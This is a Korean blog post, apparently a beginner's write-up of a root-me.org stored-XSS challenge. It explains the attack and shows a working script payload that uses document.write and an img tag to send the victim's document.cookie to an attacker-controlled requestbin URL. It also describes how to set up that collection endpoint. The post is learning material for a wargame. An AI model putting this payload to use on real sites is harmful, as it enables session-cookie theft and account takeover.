티스토리 뷰
XSS문제다. 처음 도전해본 XSS.
개념은 일단 게시판과 같이 사용자가 쓰기 권한이 있는 곳에 악성코드를 올려 저장하고,
다른 사용자가 접근해 글을 읽으면 악성코드가 실행되는 공격.
라고 개념만 알고 있다.
일단 스크립트를 이용해 alert창을 띄워보자.
이렇게 보내보자.
이렇게 alert창이 뜬다.
그리고 XSS에서 중요한게 쿠키값을 이용하는 것이다.
document.cookie를 찾아보자.
하지만 안된다.
document.write("<img src='http://내 url?="+document.cookie+"'></img>");
이렇게 보내면 된다고 한다.
document.write는 출력을 해주는 스크립트이고
img태그로 src를 내 url의 쿠키값을 정해준다.
이 때 url을 서버로 지정해 주어야 한다.
아파치 서버라던가,
이 사이트를 이용하면 된다.
여기서 create a requestbin을 클릭해서
이렇게 url을 만들어준다.
이걸 스크립트 코드에 넣어준다.
<script>document.write("<img src='여기에 url?="+document.cookie+"'></img>");</script>
이렇게 만들어서 보내주면
requestbin 사이트에
이렇게 쿠키값이 나온다.
한번에 안되니 여러번 시도해 보자.
'web wargame > root-me.org' 카테고리의 다른 글
| root-me double-extensions (0) | 2021.01.12 |
|---|---|
| root-me CRLF (0) | 2021.01.07 |
| [root-me] path traversal (0) | 2020.09.22 |
| http improper redirect (0) | 2020.09.21 |
| http verb tampering (0) | 2020.09.21 |
공지사항
최근에 올라온 글
최근에 달린 댓글
- Total
- Today
- Yesterday
링크
TAG
- automotive
- 회귀
- AE
- porks
- SOME/IP
- 이상탐지
- 딥러닝
- problem statement
- 머신러닝
- AVTP
- json2html
- 차량용 이더넷
- cuckoo
- 크로스 엔트로피
- many-to-many
- automotive ethernet
- CAN-FD
- 차량 네트워크
- Ethernet
- 논문 잘 쓰는법
- many-to-one
- 로지스틱회귀
- PCA
- Python
- one-to-many
- AVB
- 케라스
- 단순선형회귀
- SVM
- HTML
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 |
글 보관함